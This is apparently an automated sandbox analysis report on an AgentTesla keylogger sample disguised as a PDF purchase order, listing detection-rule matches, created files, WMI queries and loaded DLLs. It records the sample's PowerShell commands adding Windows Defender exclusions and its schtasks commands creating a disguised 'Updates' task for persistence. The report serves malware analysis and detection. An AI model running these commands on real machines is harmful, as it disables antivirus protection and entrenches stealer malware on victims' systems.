                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003E1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1446067123.0000000002C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000000.1387309035.000000000067A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexaHV.exeb! vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1440691328.0000000000D1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 00000000.00000002.1449696079.0000000007630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exe, 0000000A.00000002.3854298767.00000000008F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exeBinary or memory string: OriginalFilenamexaHV.exeb! vs z38PO_20248099-1_pdf.exe
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 19.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c32188.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: FrFvspxoHsPs.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3c6e9a8.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, hyUOVBe1ZWdha1wZaD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.z38PO_20248099-1_pdf.exe.7630000.6.raw.unpack, hyUOVBe1ZWdha1wZaD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.z38PO_20248099-1_pdf.exe.3e35700.4.raw.unpack, vFQ3EBHyQMQUMUhg1F.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/20@2/2
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: \Sessions\1\BaseNamedObjects\TXGnEFlEXydaiQyuTdtXJztKri
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD40B.tmp
                    Source: z38PO_20248099-1_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: z38PO_20248099-1_pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: z38PO_20248099-1_pdf.exeReversingLabs: Detection: 65%
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeFile read: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                    Source: unknownProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpD40B.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeProcess created: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe "C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmpEC46.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exeProcess created: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe "C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp675.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FrFvspxoHsPs" /XML "C:\Users\user\AppData\Local\Temp\tmp26DE.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: version.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wldp.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: profapi.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: amsi.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: userenv.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: propsys.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\z38PO_20248099-1_pdf.exeSection loaded: profapi.dllJump to behavior
